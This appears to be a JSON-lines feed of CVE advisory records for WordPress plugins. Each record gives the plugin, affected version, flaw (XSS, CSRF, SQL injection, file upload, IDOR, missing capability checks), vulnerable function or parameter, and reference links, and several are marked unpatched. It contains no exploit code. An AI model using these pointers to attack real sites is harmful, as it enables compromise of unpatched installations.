{"CVE_ID":"CVE-2023-0544","slug":"wp-login-box","versionImpact":"2.0.2","description":"The WP Login Box WordPress plugin through 2.0.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8ef9585f-67d7-4651-977a-fcad113882bd\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8ef9585f-67d7-4651-977a-fcad113882bd\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4379","slug":"woocommerce-multi-currency","versionImpact":"2.1.17.","description":"The WooCommerce Multi Currency plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the wmc_bulk_fixed_price function in versions up to, and including, 2.1.17. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to make changes to product prices.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2318ae9-4115-442e-9293-a9251787c5f3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2318ae9-4115-442e-9293-a9251787c5f3?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-multi-currency\\\/20948446\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-multi-currency\\\/20948446\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/vulnerability-fixed-in-wordpress-woocommerce-multi-currency-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/vulnerability-fixed-in-wordpress-woocommerce-multi-currency-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-49833","slug":"ultimate-addons-for-gutenberg","versionImpact":"2.7.9","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Brainstorm Force Spectra \u2013 WordPress Gutenberg Blocks allows Stored XSS.This issue affects Spectra \u2013 WordPress Gutenberg Blocks: from n\/a through 2.7.9.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ultimate-addons-for-gutenberg\\\/wordpress-spectra-plugin-2-7-9-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ultimate-addons-for-gutenberg\\\/wordpress-spectra-plugin-2-7-9-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1778","slug":"admin-side-data-storage-for-contact-form-7","versionImpact":"1.1.1","description":"The Admin side data storage for Contact Form 7 plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the zt_dcfcf_change_bookmark() function in all versions up to, and including, 1.1.1. This makes it possible for unauthenticated attackers to alter bookmark statuses.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d74040d0-1fee-4906-af6f-a5d842c42fd4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d74040d0-1fee-4906-af6f-a5d842c42fd4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admin-side-data-storage-for-contact-form-7\\\/trunk\\\/inc\\\/admin\\\/class.ztdcfcf.admin.action.php#L235\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admin-side-data-storage-for-contact-form-7\\\/trunk\\\/inc\\\/admin\\\/class.ztdcfcf.admin.action.php#L235\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3631","slug":"hl-twitter","versionImpact":"2014.1.18","description":"The HL Twitter WordPress plugin through 2014.1.18 does not have CSRF check when unlinking twitter accounts, which could allow attackers to make logged in admins perform such actions via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c59a8b49-6f3e-452b-ba9b-50b80c522ee9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c59a8b49-6f3e-452b-ba9b-50b80c522ee9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-34801","slug":"seo-wordpress","versionImpact":"4.0.15","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Mervin Praison Praison SEO WordPress allows Stored XSS.This issue affects Praison SEO WordPress: from n\/a through 4.0.15.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/seo-wordpress\\\/wordpress-praison-seo-wordpress-plugin-4-0-15-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/seo-wordpress\\\/wordpress-praison-seo-wordpress-plugin-4-0-15-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3984","slug":"embedalbum-pro","versionImpact":"1.1.29","description":"The EmbedSocial \u2013 Social Media Feeds, Reviews and Galleries plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'embedsocial_reviews' shortcode in all versions up to, and including, 1.1.29 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6593b0de-db7a-4b7e-bd74-cc2b1e36ac60?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6593b0de-db7a-4b7e-bd74-cc2b1e36ac60?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedalbum-pro\\\/trunk\\\/embedalbum_pro.php#L194\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedalbum-pro\\\/trunk\\\/embedalbum_pro.php#L194\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9023","slug":"wp-webauthn","versionImpact":"1.3.1","description":"The WP-WebAuthn plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wwa_login_form shortcode in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77247a6b-2473-4b36-9ad8-b7802e4fad32?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77247a6b-2473-4b36-9ad8-b7802e4fad32?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-webauthn\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-webauthn\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-webauthn\\\/trunk\\\/wwa-shortcodes.php#L51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-webauthn\\\/trunk\\\/wwa-shortcodes.php#L51\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-webauthn\\\/trunk\\\/blocks\\\/blocks.build.js#L1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-webauthn\\\/trunk\\\/blocks\\\/blocks.build.js#L1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10959","slug":"profit-products-tables-for-woocommerce","versionImpact":"1.0.6.5","description":"The The Active Products Tables for WooCommerce. Use constructor to create tables plugin for WordPress is vulnerable to arbitrary shortcode execution via woot_get_smth AJAX action in all versions up to, and including, 1.0.6.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profit-products-tables-for-woocommerce\\\/trunk\\\/index.php#L1666\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profit-products-tables-for-woocommerce\\\/trunk\\\/index.php#L1666\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3199368\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3199368\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/profit-products-tables-for-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/profit-products-tables-for-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ecf803cf-1b9c-4d2e-863f-d1f51b08f833?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ecf803cf-1b9c-4d2e-863f-d1f51b08f833?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12514","slug":"3dvieweronline-wp","versionImpact":"2.2.2","description":"The 3DVieweronline plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's '3Dvo-model' shortcode in all versions up to, and including, 2.2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/3dvieweronline-wp\\\/trunk\\\/public\\\/class-threedvieweronline-iframe-public.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/3dvieweronline-wp\\\/trunk\\\/public\\\/class-threedvieweronline-iframe-public.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/3dvieweronline-wp\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/3dvieweronline-wp\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee1c9c62-d5b5-4213-ae5a-d3d4e9103d15?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee1c9c62-d5b5-4213-ae5a-d3d4e9103d15?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23657","slug":"salesforce-wordpress-to-candidate","versionImpact":"1.0.1","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NotFound WordPress-to-candidate for Salesforce CRM allows Reflected XSS. This issue affects WordPress-to-candidate for Salesforce CRM: from n\/a through 1.0.1.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/salesforce-wordpress-to-candidate\\\/vulnerability\\\/wordpress-wordpress-to-candidate-for-salesforce-crm-plugin-1-0-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/salesforce-wordpress-to-candidate\\\/vulnerability\\\/wordpress-wordpress-to-candidate-for-salesforce-crm-plugin-1-0-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3851","slug":"smartpay","versionImpact":"2.7.13","description":"The Download Manager and Payment Form WordPress Plugin \u2013 WP SmartPay plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions 1.1.0 to 2.7.13 via the show() function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view other user's data like email address, name, and notes.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smartpay\\\/tags\\\/2.7.13\\\/app\\\/Http\\\/Controllers\\\/Rest\\\/CustomerController.php#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smartpay\\\/tags\\\/2.7.13\\\/app\\\/Http\\\/Controllers\\\/Rest\\\/CustomerController.php#L34\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3aade1bd-b69d-4134-a4f7-78372a291557?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3aade1bd-b69d-4134-a4f7-78372a291557?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5529","slug":"advanced-page-visit-counter","versionImpact":"8.0.6","description":"The Advanced Page Visit Counter  WordPress plugin before 8.0.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/095c9c35-2618-4f90-8435-a3c34f0bb7f1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/095c9c35-2618-4f90-8435-a3c34f0bb7f1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5700","slug":"simple-logo-carousel","versionImpact":"1.9.3","description":"The Simple Logo Carousel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id\u2019 parameter in all versions up to, and including, 1.9.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/idesolutions\\\/simple-logo-carousel\\\/commit\\\/d995b5d35e0fdc0a59307ce664e4ce1158b69bff\",\"name\":\"https:\\\/\\\/github.com\\\/idesolutions\\\/simple-logo-carousel\\\/commit\\\/d995b5d35e0fdc0a59307ce664e4ce1158b69bff\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-logo-carousel\\\/trunk\\\/includes\\\/Base\\\/Shortcode.php#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-logo-carousel\\\/trunk\\\/includes\\\/Base\\\/Shortcode.php#L40\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3312693\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3312693\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-logo-carousel\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-logo-carousel\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b25f939c-1dfe-4d4f-a27a-1f9022da6965?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b25f939c-1dfe-4d4f-a27a-1f9022da6965?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1340","slug":"unusedcss","versionImpact":"1.7.1","description":"The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.7.1. This is due to missing or incorrect nonce validation on the clear_uucss_logs function. This makes it possible for unauthenticated attackers to clear plugin logs via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/488e26e2-d4d7-4036-a672-53c2d4c9d39b\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/488e26e2-d4d7-4036-a672-53c2d4c9d39b\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2877726\\\/unusedcss\\\/trunk\\\/includes\\\/modules\\\/unused-css\\\/UnusedCSS_Admin.php?contextall=1&old=2847136&old_path=%2Funusedcss%2Ftrunk%2Fincludes%2Fmodules%2Funused-css%2FUnusedCSS_Admin.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0542","slug":"custom-post-type-list-shortcode","versionImpact":"1.4.4","description":"The Custom Post Type List Shortcode WordPress plugin through 1.4.4 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/17de2f77-3e6c-4c22-9196-6e5577ee7fcf\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/17de2f77-3e6c-4c22-9196-6e5577ee7fcf\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3211","slug":"wp-database-admin","versionImpact":"1.0.3","description":"The WordPress Database Administrator WordPress plugin through 1.0.3 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/873824f0-e8b1-45bd-8579-bc3c649a54e5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/873824f0-e8b1-45bd-8579-bc3c649a54e5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1777","slug":"admin-side-data-storage-for-contact-form-7","versionImpact":"1.1.1","description":"The Admin side data storage for Contact Form 7 plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.1. This is due to missing or incorrect nonce validation on the settings update function. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b411a97b-2f1c-4feb-b1c7-bc5a1aab7f33?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b411a97b-2f1c-4feb-b1c7-bc5a1aab7f33?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admin-side-data-storage-for-contact-form-7\\\/trunk\\\/inc\\\/admin\\\/inc\\\/settings.php#L301\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admin-side-data-storage-for-contact-form-7\\\/trunk\\\/inc\\\/admin\\\/inc\\\/settings.php#L301\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3674","slug":"inline-google-spreadsheet-viewer","versionImpact":"0.13.2","description":"The Inline Google Spreadsheet Viewer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gdoc' shortcode in all versions up to, and including, 0.13.2 due to insufficient input sanitization and output escaping on user supplied attributes such as 'chart_resolution'. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/523e80a5-dffa-4eb6-8f7a-e179e0dc4d28?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/523e80a5-dffa-4eb6-8f7a-e179e0dc4d28?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/inline-google-spreadsheet-viewer\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/inline-google-spreadsheet-viewer\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3630","slug":"hl-twitter","versionImpact":"2014.1.18","description":"The HL Twitter WordPress plugin through 2014.1.18 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cbab7639-fdb2-4ee5-b5ca-9e30701a63b7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cbab7639-fdb2-4ee5-b5ca-9e30701a63b7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2381","slug":"ali2woo-lite","versionImpact":"3.3.5","description":"The AliExpress Dropshipping with AliNext Lite plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the ajax_save_image function in all versions up to, and including, 3.3.5. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3248327-6e10-420e-83cf-a23296eb2e6f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3248327-6e10-420e-83cf-a23296eb2e6f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ali2woo-lite\\\/trunk\\\/\\\/includes\\\/classes\\\/controller\\\/WooCommerceProductEditController.php#L108\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ali2woo-lite\\\/trunk\\\/\\\/includes\\\/classes\\\/controller\\\/WooCommerceProductEditController.php#L108\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7302","slug":"blog2social","versionImpact":"7.5.4","description":"The Blog2Social: Social Media Auto Post & Scheduler plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 3gp2 file uploads in all versions up to, and including, 7.5.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the 3gp2 file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94afe3e2-a1f1-470b-afaf-c7926beaec9a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94afe3e2-a1f1-470b-afaf-c7926beaec9a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blog2social\\\/tags\\\/7.5.4\\\/includes\\\/Ajax\\\/Post.php#L78\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blog2social\\\/tags\\\/7.5.4\\\/includes\\\/Ajax\\\/Post.php#L78\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/blog2social\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/blog2social\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3128861\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3128861\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3128861\\\/#file434\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3128861\\\/#file434\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11973","slug":"quran-text-multilanguage","versionImpact":"2.3.21","description":"The Quran multilanguage Text & Audio plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'sourate' and 'lang' parameter in all versions up to, and including, 2.3.21 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203456\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203456\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/quran-text-multilanguage\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/quran-text-multilanguage\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/09afbbd2-52c6-48a6-a2f0-b1509d864e7e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/09afbbd2-52c6-48a6-a2f0-b1509d864e7e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12496","slug":"linear","versionImpact":"2.7.12","description":"The Linear plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'linear_block_buy_commissions' shortcode in all versions up to, and including, 2.7.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/linear\\\/trunk\\\/blocks\\\/buy-commissions\\\/buy-commissions.php#L213\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/linear\\\/trunk\\\/blocks\\\/buy-commissions\\\/buy-commissions.php#L213\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/linear\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/linear\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25d6ee47-2a7b-486e-856b-336964b387ae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25d6ee47-2a7b-486e-856b-336964b387ae?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
